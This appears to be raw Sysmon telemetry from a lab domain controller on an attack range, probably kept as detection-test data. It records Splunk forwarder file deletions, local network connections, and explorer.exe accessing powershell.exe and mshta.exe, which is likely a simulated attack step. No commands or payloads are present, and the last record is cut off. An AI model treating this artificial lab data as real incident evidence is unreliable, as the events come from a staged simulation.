16:56:36.467{05ADC7E1-FB1F-603C-5979-00000000AD01}6484NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=D04DD730C2DFA173B41D98E6E0FBCE24,SHA256=25BD0354816452BB32A75B30DADE46EF8E59DD04BE7128F431B20468F632A399,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245164Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:37.623{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EF8590A0A2E34DF744451ADF8F69BA84,SHA256=425219DBFF1DFF94BA09B7CCC9F661E4B0BD264B8A7EC4E510BD741B0F90BF74,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245163Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:37.608{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=193A2FAE7FBA11E5794525FA823EB7FD,SHA256=7974384EFF005EB1F12F7152F63A368E4AC7CB57BD594950B9052908485A85E3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245162Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:37.608{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=4C33BF4EFF1225D569E958E4BEDF37D2,SHA256=65907328E53E419051314F641529DBA166A77CA552D1DFEF61FE4573E5CCD877,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245161Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:37.608{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=18A460E36549B791FE2C74362D4EDB9A,SHA256=00AEB2931DC38A7DE9C4B067694E210CE25FA771524796A991687FD5E4D25D57,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245166Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:38.639{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4AAB133D34EF4AF4D7B013F74483F8A7,SHA256=69FEF52E7F7B91E24ADE4A3E9AFD4D9E42C942ABA533D9F50794FEE2F6E75FAD,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002245165Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:27.597{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60200-false10.0.1.12-8089- 23542300x80000000000000002245167Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:39.673{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=30E3B6C9834EECD0C176EB70F4707915,SHA256=7F1F944C96C7C139AE5F9DE5D705C09BBFD546C844BF71617B10C2D72080D948,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245169Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:40.748{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C178D7667926227561FB6C0629574F2E,SHA256=CE30D3B3018D2BA2965C21F19A6186BBFBC9A014F36F4E2E07DFE83FA6A12752,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245168Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:40.733{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BD8372CC6116EFEE2AC8199E1FE4EACD,SHA256=CA2D3640C34DC1919C78C2E74929F19D446CB22F6EE9776A83057AA45958D503,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245173Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:41.764{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA78398C7DFC8CFF9D55B6CFCD2767FA,SHA256=B5F918CD4C4BE14FDBC5185E3626371417371DC79EA71F8753514EF8D5B71843,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245172Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:41.764{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E7D7494CE8785BA9C11C97F913C65C28,SHA256=B7483DE9062F4BDEB535937567397322DEA52B0954D879C93ECA4A5F3FA4ABB6,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002245171Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:31.222{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60201-false10.0.1.12-8000- 354300x80000000000000002245170Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:30.877{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local49742- 23542300x80000000000000002245175Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:42.785{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9AD2D335A497FF1014FB549D2F4CB347,SHA256=968B32AE211A226021683084F24D864EE12CFC0DA9BBDAE07342A185756689F4,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002245174Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:31.893{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-974.attackrange.local53domainfalse127.0.0.1win-dc-974.attackrange.local49742- 23542300x80000000000000002245176Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:43.876{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=20EA28E30C33D322D21456E5008DB1D6,SHA256=E00C11E7C6D24E4A3D048EBFAB79E09F13233053153DD7C471C622FBAEA525F5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245184Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:44.905{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8DFE3B4D3B80ABEA831D2CE7AF1CB1B9,SHA256=21A267F5D7B1A9AD1C8096BE5D3E7CD1AD464D54EEB69A9F8939558DFF674B69,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245183Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:44.811{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=669439E33C79F5613C433654D03C714C,SHA256=8506877695542E472D8BC37F5A8193A09B156F9E0EFB6C5307DAA5925A1E3FC3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002245182Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:44.514{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014868C:\Windows\explorer.exe{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+16679|C:\Windows\System32\SHELL32.dll+af480|C:\Windows\System32\SHELL32.dll+b0987|C:\Windows\explorer.exe+3c618|C:\Windows\explorer.exe+3c4a4|C:\Windows\explorer.exe+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245181Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:44.514{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014868C:\Windows\explorer.exe{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+aef34|C:\Windows\System32\SHELL32.dll+b0987|C:\Windows\explorer.exe+3c618|C:\Windows\explorer.exe+3c4a4|C:\Windows\explorer.exe+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245180Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:44.514{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014764C:\Windows\explorer.exe{05ADC7E1-6CB1-603E-35AA-00000000AD01}14828C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+aecdf|C:\Windows\System32\SHELL32.dll+b0420|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245179Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:44.514{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014764C:\Windows\explorer.exe{05ADC7E1-6CB1-603E-35AA-00000000AD01}14828C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+95ad0|C:\Windows\System32\SHELL32.dll+b03dc|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245178Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:44.514{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014764C:\Windows\explorer.exe{05ADC7E1-6CB1-603E-35AA-00000000AD01}14828C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+aef34|C:\Windows\System32\SHELL32.dll+b03b0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245177Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:44.514{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014764C:\Windows\explorer.exe{05ADC7E1-6CB1-603E-35AA-00000000AD01}14828C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002245185Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:45.920{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C57A068FD9920AA33941022342EBAEA,SHA256=3FA12E4113C1EEC8AB9545B8A9D70610D906698A58AFC3B23FF08E2CC215BF1C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245201Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:46.936{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7BBCFEBEFB37E78AF99ADCC2750F88F6,SHA256=FE7DE6335223E658C5D3C759132E851203D24E49C9AAE8619112ECBE78D33BE4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002245200Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:46.905{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014868C:\Windows\explorer.exe{05ADC7E1-6E3E-603E-05AB-00000000AD01}3592C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+aecdf|C:\Windows\System32\SHELL32.dll+b0aa5|C:\Windows\explorer.exe+3c618|C:\Windows\explorer.exe+3c4a4|C:\Windows\explorer.exe+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245199Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:46.905{05ADC7E1-59B2-603E-BEA7-00000000AD01}161806624C:\Windows\explorer.exe{05ADC7E1-6E3E-603E-05AB-00000000AD01}3592C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+aecdf|C:\Windows\System32\SHELL32.dll+b0aa5|C:\Windows\explorer.exe+1e03a|C:\Windows\explorer.exe+1e249|C:\Windows\explorer.exe+1df79|C:\Windows\explorer.exe+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245198Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:46.905{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014868C:\Windows\explorer.exe{05ADC7E1-6E3E-603E-05AB-00000000AD01}3592C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b09be|C:\Windows\explorer.exe+3c618|C:\Windows\explorer.exe+3c4a4|C:\Windows\explorer.exe+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245197Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:46.905{05ADC7E1-59B2-603E-BEA7-00000000AD01}161806624C:\Windows\explorer.exe{05ADC7E1-6E3E-603E-05AB-00000000AD01}3592C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b09be|C:\Windows\explorer.exe+1e03a|C:\Windows\explorer.exe+1e249|C:\Windows\explorer.exe+1df79|C:\Windows\explorer.exe+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245196Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:46.905{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014868C:\Windows\explorer.exe{05ADC7E1-6E3E-603E-05AB-00000000AD01}3592C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+aef34|C:\Windows\System32\SHELL32.dll+b0987|C:\Windows\explorer.exe+3c618|C:\Windows\explorer.exe+3c4a4|C:\Windows\explorer.exe+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245195Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:46.905{05ADC7E1-59B2-603E-BEA7-00000000AD01}161806624C:\Windows\explorer.exe{05ADC7E1-6E3E-603E-05AB-00000000AD01}3592C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+aef34|C:\Windows\System32\SHELL32.dll+b0987|C:\Windows\explorer.exe+1e03a|C:\Windows\explorer.exe+1e249|C:\Windows\explorer.exe+1df79|C:\Windows\explorer.exe+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245194Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:46.905{05ADC7E1-59B2-603E-BEA7-00000000AD01}161806624C:\Windows\explorer.exe{05ADC7E1-6E3E-603E-05AB-00000000AD01}3592C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\explorer.exe+1f054|C:\Windows\explorer.exe+1f000|C:\Windows\explorer.exe+1dfec|C:\Windows\explorer.exe+1e249|C:\Windows\explorer.exe+1df79|C:\Windows\explorer.exe+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245193Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:46.905{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014764C:\Windows\explorer.exe{05ADC7E1-6E3E-603E-05AB-00000000AD01}3592C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+aecdf|C:\Windows\System32\SHELL32.dll+b0420|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245192Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:46.905{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014764C:\Windows\explorer.exe{05ADC7E1-6E3E-603E-05AB-00000000AD01}3592C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+95ad0|C:\Windows\System32\SHELL32.dll+b03dc|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245191Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:46.905{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014764C:\Windows\explorer.exe{05ADC7E1-6E3E-603E-05AB-00000000AD01}3592C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+aef34|C:\Windows\System32\SHELL32.dll+b03b0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245190Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:46.905{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014764C:\Windows\explorer.exe{05ADC7E1-6E3E-603E-05AB-00000000AD01}3592C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245189Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:46.795{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014764C:\Windows\explorer.exe{05ADC7E1-6E3E-603E-05AB-00000000AD01}3592C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+aecdf|C:\Windows\System32\SHELL32.dll+b0420|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245188Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:46.795{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014764C:\Windows\explorer.exe{05ADC7E1-6E3E-603E-05AB-00000000AD01}3592C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+95ad0|C:\Windows\System32\SHELL32.dll+b03dc|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245187Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:46.795{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014764C:\Windows\explorer.exe{05ADC7E1-6E3E-603E-05AB-00000000AD01}3592C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+aef34|C:\Windows\System32\SHELL32.dll+b03b0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245186Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:46.795{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014764C:\Windows\explorer.exe{05ADC7E1-6E3E-603E-05AB-00000000AD01}3592C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002245204Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:47.967{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=42848D014B323AEA769B6424553FD953,SHA256=95477D9EC7515C538BA3D7981BD5FC19CC49DC6EBEF53BED49B40D09E5CE3FDA,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002245203Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:37.222{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program 